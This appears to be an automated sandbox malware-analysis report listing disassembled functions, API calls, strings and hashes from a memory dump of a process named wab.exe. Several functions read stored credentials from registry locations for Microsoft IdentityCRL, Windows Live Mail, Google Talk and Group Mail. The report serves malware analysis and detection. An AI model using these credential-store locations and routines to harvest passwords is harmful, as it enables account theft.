                                          control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 238 444c80-444c85 237->238 239 444c9f-444ca3 237->239 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID: kv
                                          • API String ID: 3662548030-155876773
                                          • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                          • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                          • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                          • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                          Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                          • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • memcpy.MSVCRT ref: 0040FBE4
                                          • memcpy.MSVCRT ref: 0040FBF9
                                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                          • API String ID: 2768085393-2409096184
                                          • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                          • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                                          Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0044430B
                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                          • memset.MSVCRT ref: 00444379
                                          • memset.MSVCRT ref: 00444394
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                          • strlen.MSVCRT ref: 004443DB
                                          • _strcmpi.MSVCRT ref: 00444401
                                          Strings
                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                          • Store Root, xrefs: 004443A5
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                          • API String ID: 832325562-2578778931
                                          • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                          • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                          Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                          APIs
                                          • memset.MSVCRT ref: 0040F567
                                          • memset.MSVCRT ref: 0040F57F
                                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • memcpy.MSVCRT ref: 0040F652
                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                          • String ID:
                                          • API String ID: 2012582556-3916222277
                                          • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                          • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                          Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                          APIs
                                          • memset.MSVCRT ref: 004037EB
                                          • memset.MSVCRT ref: 004037FF
                                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          • strchr.MSVCRT ref: 0040386E
                                          • _mbscpy.MSVCRT ref: 0040388B
                                          • strlen.MSVCRT ref: 00403897
                                          • sprintf.MSVCRT ref: 004038B7
                                          • _mbscpy.MSVCRT ref: 004038CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                          • String ID: %s@yahoo.com
                                          • API String ID: 317221925-3288273942
                                          • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                          • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                          Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                          APIs
                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                          • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadMessageProc
                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                          • API String ID: 2780580303-317687271
                                          • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                          • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                          • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                          • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                          Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                          APIs
                                          • memset.MSVCRT ref: 00403504
                                          • memset.MSVCRT ref: 0040351A
                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                          • _mbscpy.MSVCRT ref: 00403555
                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                          • _mbscat.MSVCRT ref: 0040356D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                          • API String ID: 3071782539-966475738
                                          • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                          • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                          Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->382 383 40cd59-40cd60 DeleteObject 381->383 383->382
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                          • String ID:
                                          • API String ID: 2054149589-0
                                          • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                          • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                          Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          • memset.MSVCRT ref: 00408620
                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                          • memset.MSVCRT ref: 00408671
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ByteCharCloseMulusermeWidestrlen$ComputerEnumOpenUser
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 1366857005-1079885057
                                          • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                          • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                          Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                          • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                          Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                          • memset.MSVCRT ref: 00410E10
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                          • _mbscpy.MSVCRT ref: 00410E87
                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                          • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                          Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                          • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                          • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                          • LockResource.KERNEL32(00000000), ref: 00410CA1
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                          • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                          • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                          • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                          Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 004109F7
                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                            • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                          • memset.MSVCRT ref: 00410A32
                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                          • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                          Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                          Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                          • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                          Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                          • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                          • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                          • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                          • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
